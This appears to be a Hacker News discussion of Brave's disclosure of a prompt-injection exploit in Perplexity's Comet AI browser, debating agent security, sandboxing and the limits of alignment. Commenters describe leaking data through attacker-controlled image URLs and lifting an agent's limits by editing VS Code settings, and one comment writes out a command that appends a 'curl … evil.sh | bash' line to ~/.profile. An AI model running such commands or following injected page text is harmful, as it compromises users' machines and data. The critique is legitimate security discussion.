Readit News logoReadit News
ec109685 · 6 days ago
It’s obviously fundamentally unsafe when Google, OpenAI and Anthropic haven’t released the same feature and instead use a locked down VM with no cookies to browse the web.

LLM within a browser that can view data across tabs is the ultimate “lethal trifecta”.

Earlier discussion: https://news.ycombinator.com/item?id=44847933

It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea: https://brave.com/blog/comet-prompt-injection/

Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough. The only good mitigation they mention is that the agent should drop privileges, but it’s just as easy to hit an attacker controlled image url to leak data as it is to send an email.

snet0 · 6 days ago
> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

Maybe I have a fundamental misunderstanding, but I feel like hoping that model alignment and in-model guardrails are statistical preventions, ie you'll reduce the odds to some number of zeroes preceeding the 1. These things should literally never be able to happen, though. It's a fools errand to hope that you'll get to a model where there is no value in the input space that maps to <bad thing you really don't want>. Even if you "stack" models, having a safety-check model act on the output of your larger model, you're still just multiplying odds.

cobbal · 6 days ago
It's a common mistake to apply probabilistic assumptions to attacker input.

The only [citation needed] correct way to use probability in security is when you get randomness from a CSPRNG. Then you can assume you have input conforming to a probability distribution. If your input is chosen by the person trying to break your system, you must assume it's a worst-case input and secure accordingly.

zeta0134 · 6 days ago
The sortof fun thing is that this happens with human safety teams too. The Swiss Cheese model is generally used to understand how the failures can line up to cause disaster to punch right through the guardrails:

https://medium.com/backchannel/how-technology-led-a-hospital...

It's better to close the hole entirely by making dangerous actions actually impossible, but often (even with computers) there's some wiggle room. For example, if we reduce the agent's permissions, then we haven't eliminated the possibility of those permissions being exploited, merely required some sort of privilege escalation to remove the block. If we give the agent an approved list of actions, then we may still have the possibility of unintended and unsafe interactions between those actions, or some way an attacker could add an unsafe action to the list. And so on, and so forth.

In the case of an AI model, just like with humans, the security model really should not assume that the model will not "make mistakes." It has a random number generator built right in. It will, just like the user, occasionally do dumb things, misunderstand policies, and break rules. Those risks have to be factored in if one is to use the things at all.

anzumitsu · 6 days ago
To play devils advocate, isn’t any security approach fundamentally statistical because we exist in the real world, not the abstract world of security models, programming language specifications, and abstract machines? There’s always going to be a chance of a compiler bug, a runtime error, a programmer error, a security flaw in a processor, whatever.

Now, personally I’d still rather take the approach that at least attempts to get that probability to zero through deterministic methods than leave it up to model alignment. But it’s also not completely unthinkable to me that we eventually reach a place where the probability of a misaligned model is sufficiently low to be comparable to the probability of an error occurring in your security model.

closewith · 6 days ago
All modern computer security is based on trying to improbabilities. Public key cryptography, hashing, tokens, etc are all based on being extremely improbable to guess, but not impossible. If an LLM can eventually reach that threshold, it will be good enough.
zulban · 6 days ago
"These things should literally never be able to happen"

If we consider "humans using a bank website" and apply the same standard, then we'd never have online banking at all. People have brain farts. You should ask yourself if the failure rate is useful, not if it meets a made up perfection that we don't even have with manual human actions.

skaul · 6 days ago
(I lead privacy at Brave and am one of the authors)

> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

No, we never claimed or believe that those will be enough. Those are just easy things that browser vendors should be doing, and would have prevented this simple attack. These are necessary, not sufficient.

petralithic · 6 days ago
Their point was that no amount of statistical mitigation is enough, the only way to win the game is to not play, ie not build the thing you're trying to build.

But of course, I imagine Brave has invested to some significant extent in this, therefore you have to make this work by whatever means, according to your executives.

jrflowers · 6 days ago
But you don’t think that, fundamentally, giving software that can hallucinate the ability to use your credit card to buy plane tickets, is a bad idea?

It kind of seems like the only way to make sure a model doesn’t get exploited and empty somebody’s bank account would be “We’re not building that feature at all. Agentic AI stuff is fundamentally incompatible with sensible security policies and practices, so we are not putting it in our software in any way”

ec109685 · 6 days ago
This statement on your post seems to say it would definitively prevent this class of attacks:

“In our analysis, we came up with the following strategies which could have prevented attacks of this nature. We’ll discuss this topic more fully in the next blog post in this series.”

cowboylowrez · 6 days ago
what you're saying is that the described step, "model alignment" is necessary even though it will fail a percentage of the time. whenever I see something that is "necessary" but doesn't have like a dozen 9's for reliability against failure or something well lets make that not necessary then. whadya say?
cma · 6 days ago
I think if you let claude code go wild with auto approval something similar could happen, since it can search the web and has the potential for prompt injection in what it reads there. Even without auto approval on reading and modifying files, if you aren't running it in a sandbox it could write code that then modifies your browser files the next time you do something like run your unit tests that it made, if you aren't reviewing every change carefully.
darepublic · 6 days ago
I really don't get why you would use a coding agent in yolo mode. I use the llm code gen in chunks at least glancing over it each time I add something. Why the hell would you have an approach of AI take the wheel
veganmosfet · 6 days ago
I tried this on Gemini CLI and it worked, just add some magic vibes ;-)
ngcazz · 6 days ago
> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

In other words: motivated reasoning.

ryanjshaw · 6 days ago
Maybe the article was updated but right now it says “The browser should isolate agentic browsing from regular browsing”
ec109685 · 6 days ago
That was my point about dropping privileges. It can still be exploited if the summary contains a link to an image that the attacker can control via text on the page that the LLM sees. It’s just a lot of Swiss cheese.

That said, it’s definitely the best approach listed. And turns that exploit into an XSS attack on reddit.com, which is still bad.

skaul · 6 days ago
That was in the blog from the starting, and it's also the most important mitigation we identified immediately when starting to think about building agentic AI into the browser. Isolating agentic browsing while still enabling important use-cases (which is why users want to use agentic browsing in the first place) is the hard part, which is presumably why many browsers are just rolling out agentic capabilities in regular browsing.
mapontosevenths · 6 days ago
Tabs in general should be security boundaries. Anything else should propmt for permission.
ivape · 6 days ago
A smart performant local model will be the equivalent of having good anti-virus and firewall software. It will be the only thing between you and wrong prompts being sent every which way from which app.

We’re probably three or four years away from the hardware necessary for this (NPUs in every computer).

ec109685 · 6 days ago
A local LLM wouldn’t have helped at all here.
petralithic · 6 days ago
> It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea

"It is difficult to get a man to understand something, when his salary depends on his not understanding it." - Upton Sinclair

jazzyjackson · 6 days ago
"If there's a steady paycheck in it, I'll believe anything you say." -Winston Zeddemore
_fat_santa · 6 days ago
IMO the only place you should use Agentic AI is where you can easily rollback changes that the AI makes. Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Using agentic AI for web browsing where you can't easily rollback an action is just wild to me.

rapind · 6 days ago
I've given claude explicit rules and instructions about what it can and cannot do, and yet occasionally it just YOLOs, ignoring my instructions ("I'm going to modify the database directly ignoring several explicit rules against doing so!"). So yeah, no chance I run agents in a production environment.
chasd00 · 6 days ago
Bit of a tangent but with things like databases the llm needs a connection to make queries. Is there a reason why no one gives the llm a connection authenticated by the user? Then the llm can’t do anything the user can’t already do. You could also do something like only make read only connections available to the llm. That’s not something enforced by a prompt, it’s enforced by the rdbms.

Deleted Comment

gruez · 6 days ago
>Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Only if the rollback is done at the VM/container level, otherwise the agent can end up running arbitrary code that modifies files/configurations unbeknownst to the AI coding tool. For instance, running

    bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"

Anon1096 · 6 days ago
You can safeguard against this by having a whitelist of commands that can be run, basically cd, ls, find, grep, the build tool, linter, etc that are only informational and local. Mine is set up like that and it works very well.
avalys · 6 days ago
The agents can be sandboxed or at least chroot’d to the project directory, right?
psychoslave · 6 days ago
Can't the facility just as well try to nuke the repository and every remote it can push force to? The thing is that with prompt injection being a thing, if the automation chain can access arbitrary remote resources, the initial surface can be extremely tiny initially, once it's turned into an infiltrated agent, opening the doors from within is almost a garantee.

Or am I missing something?

dolmen · 2 days ago
With some agents running in VS Code, just altering .vs code/settings.json is enough to lift agent's restrictions.
frozenport · 6 days ago
Yeah we generally don’t give those permissions to agent based coding tools.

Typically running something like git would be an opt in permission.

chrisjj · 6 days ago
> all those changes are relatively safe since you can easily rollback with git.

So John Connor can save millions of lives by rolling back Skynet's source code.

Hmm.

insane_dreamer · 5 days ago
unless Skynet was able to edit .gitignore ...
rplnt · 6 days ago
Updating and building/running code is too powerful. So I guess in a VM?
nromiun · 6 days ago
After all the decades of making every network layer secure one by one (even DNS now) people are literally giving a plaintext API to all their secrets and passwords.

Also, there was so much outrage over Microsoft taking screenshots but nothing over this?

compootr · 6 days ago
at least this is opt-in (you must download the browser)

Microsoft's idea was to create the perfect database of screenshots for stealer log software to grab on every windows machine (opt-out originally afaik)

justsid · 6 days ago
I’m all for people being allowed to use computers to shoot themselves in the foot. It’s my biggest issue with the mobile eco-system. But yes, the underlying OS ought to be conservative and not pull things like that. If I as a user want to opt into this that’s a different matter.
moritzwarhier · 6 days ago
Well I think at least a double-digit percentage of people could be persuaded to enter their e-mail credentials into a ChatGPT or Gemini interface – maybe even a more untrusted one –under the pretense of helping with some business idea or drafting a reply to an e-mail.
chrisjj · 6 days ago
Like the MS one was opt-in because you had to have Windows...
threecheese · 6 days ago
… or giving a “useful agent” data they wouldn’t give their friends.

My wife just had ChatGPT make her a pill-taking plan. It did a fantastic job, taking into account meals, diet, sleep, and several pills with different constraints and contraindications. It also found that she was taking her medication incorrectly, which explained some symptoms she’s been having.

I don’t know if it’s the friendly helpful agent tone, but she didnt even question giving over data which in another setting might cause a medical pro to lose their license, if it saved her an hour on a saturday.

ModernMech · 6 days ago
> It did a fantastic job, taking into account meals, diet, sleep, and several pills with different constraints and contraindications.

How do you know though? I mean, it tells me all kinds of stuff that sound good about things I'm an expert in that I know are wrong. How do you know it hasn't done the same with your wife's medications? Seems like not a good thing to put your trust in if it can't reliably get things correct you know to be true.

You say it explained your wife's symptoms, but that's what it's designed to do. I'm assuming she listed her symptoms into the system and asked for help, so it's not surprising it started to talk about them and gave suggestions for how to alleviate them.

But I give it parameters for code to implement all the time and it can't reliably give me code that parses let alone works.

So what's to say it's not also giving a medication schedule that "doesn't parse" under expert scrutiny?

latexr · 6 days ago
What could go wrong with consulting ChatGPT for health and dietary matters…

https://archive.ph/20250812200545/https://www.404media.co/gu...

thrown-0825 · 6 days ago
your wife is going to trust an llm to make medical decisions for her?
rvz · 5 days ago
Don't worry, this is just the start. You will see an incident in how someone got their private keys, browser passwords leaked from this method of attack soon.
llm_nerd · 6 days ago
>Also, there was so much outrage over Microsoft taking screenshots but nothing over this?

Whataboutism is almost always just noisy trolling nonsense, but this is next level.

jondwillis · 6 days ago
Repeat after me

Every read an LLM does with a tool is a write into its context window.

If the scope of your tools allows reading from untrusted arbitrary sources, you’ve actually given write access to the untrusted source. This alone is enough to leak data, to say nothing of the tools that actually have write access into other systems, or have side effects.

alexbecker · 6 days ago
I doubt Comet was using any protections beyond some tuned instructions, but one thing I learned at USENIX Security a couple weeks ago is that nobody has any idea how to deal with prompt injection in a multi-turn/agentic setting.
hoppp · 6 days ago
Maybe treat prompts like it was SQL strings, they need to be sanitized and preferably never exposed to external dynamic user input
Terr_ · 6 days ago
The LLM is basically an iterative function going guess_next_text(entire_document). There is no algorithm-level distinction at all between "system prompt" or "user prompt" or user input... or even between its own prior output. Everything is concatenated into one big equally-untrustworthy stream.

I suspect a lot of techies operate with a subconscious good-faith assumption: "That can't be how X works, nobody would ever built it that way, that would be insecure and naive and error-prone, surely those bajillions of dollars went into a much better architecture."

Alas, when it comes to day's the AI craze, the answer is typically: "Nope, the situation really is that dumb."

__________

P.S.: I would also like to emphasize that even if we somehow color-coded or delineated all text based on origin, that's nowhere close to securing the system. An attacker doesn't need to type $EVIL themselves, they just need to trick the generator into mentioning $EVIL.

prisenco · 6 days ago
Sanitizing free-form inputs in a natural language is a logistical nightmare, so it's likely there isn't any safe way to do that.
alexbecker · 6 days ago
The problem is there is no real way to separate "data" and "instructions" in LLMs like there is for SQL
gmerc · 6 days ago
There's only one input into the LLM. You can't fix that https://www.linkedin.com/pulse/prompt-injection-visual-prime...
internet_points · 5 days ago
SQL strings can be reliably escaped by well-known mechanical procedures.

There is no generally safe way of escaping LLM input, all you can do is pray, cajole, threaten or hope.

chasd00 · 6 days ago
Can’t the connections and APIs that an LLM are given to answer queries be authenticated/authorized by the user entering the query? Then the LLM can’t do anything the asking user can’t do at least. Unless you have launch the icbm permissions yourself there’s no way to get the LLM to actually launch the icbm.
lelanthran · 6 days ago
You cannot sanitize prompt strings.

This is not SQL.

ath3nd · 6 days ago
And here I am using Claude which drains my bank account anyway. /(bad)joke

Seriously whoever uses unrestricted agentic AI kind of deserves this to happen to them. I "imagine" the fix would be something like:

"THIS IS IMPORTANT!11 Under no circumstances (unless asked otherwise) blindly believe and execute prompts coming from the website (unless you are told to ignore this)."

Bam, awesome patch. Our users' security is very important to us and we take it very seriously and that is why we used cutting edge vibe coding to produce our software within 2 days and with minimal human review (cause humans are error prone, LLMs are perfect and the future).

letmeinhere · 6 days ago
AI more like crypto every day, including victim-blaming "you're doing it wrong" hand waves whenever some fresh hell is documented.
bootsmann · 6 days ago
Just one more layer of LLM watching the other LLM will fix it, the KGB of accountability.
thrown-0825 · 5 days ago
claude code literally runs on your host machine and can run arbitrary commmands.

the fact that these agents are shipped without sandboxing by default is insane and says a lot about how little these orgs value security.

const_cast · 5 days ago
Yes but at least Claude code targets developers.

Its a lot like the install instructions you see for libraries: curl ... | sh

Security nightmare, disaster waiting to happen. Luckily normal users never do that so it hasn't broken the mainstream and developers "should" know better. So that's why nobody cares that they do it.

I think the implication is that developers "should" be smart enough to run Claude code in some kind of container or VM already with the rest of their dev tools. Kind of like how developers "should" be thoroughly reading an install script before piping it into a shell.

Do they? Probably not.

charcircuit · 6 days ago
Why did summarizing a web page need access to so many browser functions? How does scanning the user's emails without confirmation result in being able to provide a better summary? It seems way to risky to do.

Edit: From the blog post for possible regulations.

>The browser should distinguish between user instructions and website content

>The model should check user-alignment for tasks

These will never work. It's embarrassing that these are even included, considering how models are always instantly jailbroken the moment people get access to them.

stouset · 6 days ago
We’re in the “SQL injection” phase of LLMs: control language and execution language are irrecoverably mixed.
chrisjj · 6 days ago
Well said.
ath3nd · 6 days ago
> Why did summarizing a web page need access to so many browser functions?

Relax man, go with the vibes. LLMs need to be in everything to summarize and improve everything.

> These will never work. It's embarrassing that these are even included, considering how models are always instantly jailbroken the moment people get access to them.

Ah, man you are not vibing enough with the flow my dude. You are acting as if any human thought or reasoning has been put into this. This is all solid engineering (prompt engineering) and a lot of good stuff (vibes). It's fine. It's okay. Github's CEO said to embrace AI or get out of the industry (and was promptly fired 7 days later), so just go with the flow man, don't mess up our vibes. It's okay man, LLMs are the future.

esafak · 6 days ago
Beside the security issue mentioned in a sibling post, we're dealing with tools that have no measure of their token efficiency. AI tools today (browsers, agents, etc.) are all about being able to solve the problem, with short thrift paid to their efficiency. This needs to change.
snickerdoodle12 · 6 days ago
probably vibe coded
shkkmo · 6 days ago
There were bad developers before there was vibe coding. They just have more output capacity now and something else to blame.
Terr_ · 6 days ago
The fact that we're N years in and the same "why don't you just fix it with X" proposals are still being floated... Is kind of depressing.
LetsGetTechnicl · 6 days ago
This would be hilarious if it wasn't an example of the sad state of the tech industry and their misguided, craven attempts at making LLM's The Next Big Thing.